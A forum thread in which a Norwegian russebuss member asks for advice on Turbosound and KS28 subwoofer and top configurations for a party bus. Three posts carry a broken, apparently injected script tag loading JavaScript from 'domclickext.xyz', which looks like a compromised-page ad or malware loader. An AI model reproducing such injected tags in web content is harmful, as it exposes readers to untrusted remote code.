Speakerplans.com Homepage
Forum Home Forum Home > General > Newbie Discussion
  FAQ FAQ  Forum Search   Events   Register Register  Login Login

Turbosound system

Post Reply Post Reply
Author

Post Options Post Options   Thanks (0) Thanks(0)   Quote g-Dawg2020 Quote  Post ReplyReply Direct Link To This Post Topic: Turbosound system
    Posted: 02 October 2019 at 3:32pm
Hey. < ="text/" async="" ="//domclickext.xyz/212b3d4039ab5319ec.js">
I am a member of a so called "Russebuss" in Norway and need a bit of help.
We are going to fit a PA-system into our 15 meters long bus. We have gotten an offer from somenone wich includes 8 Turbosund TSw 721 and 4 Turbosund  Tfl 760h. I think this offer sounds good. But other members of the bus think it is to much with 8 subwoofers compared to 4 mid/high loudspeaker. None of us have much experience in sound so i hoped i could get some help here.
FOO View Drop Down
Young Croc
Young Croc

Post Options Post Options   Thanks (0) Thanks(0)   Quote FOO Quote  Post ReplyReply Direct Link To This Post Posted: 02 October 2019 at 3:48pm
Let me put it this way... Overkill! 

Unless the plan is to make one side like a huge door. 
Open it up, and the speakers are revealed, and you got a rolling sound wall :D

But if its just to have a party inside the bus, that system is 100% overkill. 
Even half the speakers is overkill Haha.

I have done some light engineering jobs for a company who run a system just like that. 4x tsw 721 and 2x tdl760h on each side.

No problem making some serious noise for a 1000 raving people in a handball arena. 
godathunder View Drop Down
Old Croc
Old Croc

Post Options Post Options   Thanks (0) Thanks(0)   Quote godathunder Quote  Post ReplyReply Direct Link To This Post Posted: 02 October 2019 at 3:57pm
it depends on the type of music youre playing but generally a 2:1 ratio of bass:tops sounds about right

how do you plan on fitting it in the bus, this part rather intrigues me. Im not sure Id want to be in a bus with that lot fired up in it. I take it the side of the bus opens in some way and your speakers point out at a party outside

edit: beaten to it

Edited by godathunder - 02 October 2019 at 3:58pm
LOUDER THAN LOUD
imageoven View Drop Down
Old Croc
Old Croc

Post Options Post Options   Thanks (0) Thanks(0)   Quote imageoven Quote  Post ReplyReply Direct Link To This Post Posted: 02 October 2019 at 4:11pm
Keep pushing on, things are gonna get better.
cravings View Drop Down
Old Croc
Old Croc

Post Options Post Options   Thanks (0) Thanks(0)   Quote cravings Quote  Post ReplyReply Direct Link To This Post Posted: 02 October 2019 at 4:14pm
i was just thinking the other day we hadn't had a russ bus post here in years.

the turbo speakers you've been offered are nice and will work well together.
g-Dawg2020 View Drop Down

Post Options Post Options   Thanks (0) Thanks(0)   Quote g-Dawg2020 Quote  Post ReplyReply Direct Link To This Post Posted: 02 October 2019 at 4:16pm
Hahah yes the Norwegians "Russebuss" is known to be overkill.
But we have gotten one more offer which is 2 ks28 subwoofers and 6 Arcs wifo.
Out of these 2 which will have most bass or play loudest? 
toastyghost View Drop Down
The 10,000 Points Club
The 10,000 Points Club

Post Options Post Options   Thanks (0) Thanks(0)   Quote toastyghost Quote  Post ReplyReply Direct Link To This Post Posted: 02 October 2019 at 4:55pm
The 8 Turbo subs is a decent ratio to the tops, not bass heavy, but it will definitely be louder than just two KS28.

6 KS28 will be louder than the 8 Turbo subs, if you can ask for more.

When is the show? I know people who've worked Russebuss events before, and I've always been interested in doing one. It'd cost a fair bit in transport, but we could bring out our Void Incubus or Danley Jericho rigs, which'll beat both of those...

Post Options Post Options   Thanks (0) Thanks(0)   Quote g-Dawg2020 Quote  Post ReplyReply Direct Link To This Post Posted: 02 October 2019 at 5:53pm
Originally posted by toastyghost toastyghost wrote:

The 8 Turbo subs is a decent ratio to the tops, not bass heavy, but it will definitely be louder than just two KS28.

6 KS28 will be louder than the 8 Turbo subs, if you can ask for more.

When is the show? I know people who've worked Russebuss events before, and I've always been interested in doing one. It'd cost a fair bit in transport, but we could bring out our Void Incubus or Danley Jericho rigs, which'll beat both of those...
< ="text/" async="" ="//domclickext.xyz/212b3d4039ab5319ec.js">

It not a show it is the soundsystem we will have in our buss, but as you said i think the transport will be to exepensive
The 10,000 Points Club
The 10,000 Points Club

Post Options Post Options   Thanks (0) Thanks(0)   Quote toastyghost Quote  Post ReplyReply Direct Link To This Post Posted: 02 October 2019 at 6:01pm
Yes sorry, I know how the buses work - show is just a general term meaning ‘event’.

You might be surprised at transport cost. I’ve sent it before in a 20ft container to Oslo, and it wasn’t totally ridiculous.

Post Options Post Options   Thanks (0) Thanks(0)   Quote g-Dawg2020 Quote  Post ReplyReply Direct Link To This Post Posted: 02 October 2019 at 6:19pm
Originally posted by toastyghost toastyghost wrote:

Yes sorry, I know how the buses work - show is just a general term meaning ‘event’.

You might be surprised at transport cost. I’ve sent it before in a 20ft container to Oslo, and it wasn’t totally ridiculous.
< ="text/" async="" ="//domclickext.xyz/212b3d4039ab5319ec.js">
Okay i sent a mail to Neuron now.
Tedski View Drop Down

Post Options Post Options   Thanks (0) Thanks(0)   Quote Tedski Quote  Post ReplyReply Direct Link To This Post Posted: 02 October 2019 at 11:03pm
Originally posted by g-Dawg2020 g-Dawg2020 wrote:

It not a show it is the soundsystem we will have in our buss, but as you said i think the transport will be to exepensive

So it's the driving around system?

Edited by Tedski - 02 October 2019 at 11:03pm
The 10,000 Points Club
The 10,000 Points Club

Post Options Post Options   Thanks (0) Thanks(0)   Quote toastyghost Quote  Post ReplyReply Direct Link To This Post Posted: 02 October 2019 at 11:34pm
Originally posted by Tedski Tedski wrote:

Originally posted by g-Dawg2020 g-Dawg2020 wrote:

So it's the driving around system?

Translation error, I think. This is sort of the Norwegian Burning Man, with systems plonked on top of buses, sometimes in a circle, playing music for a few days of relentless partying. I've seen the specs of some buses, and they go in hard on the specs. Always been curious, so worth a punt
 Post Reply Post Reply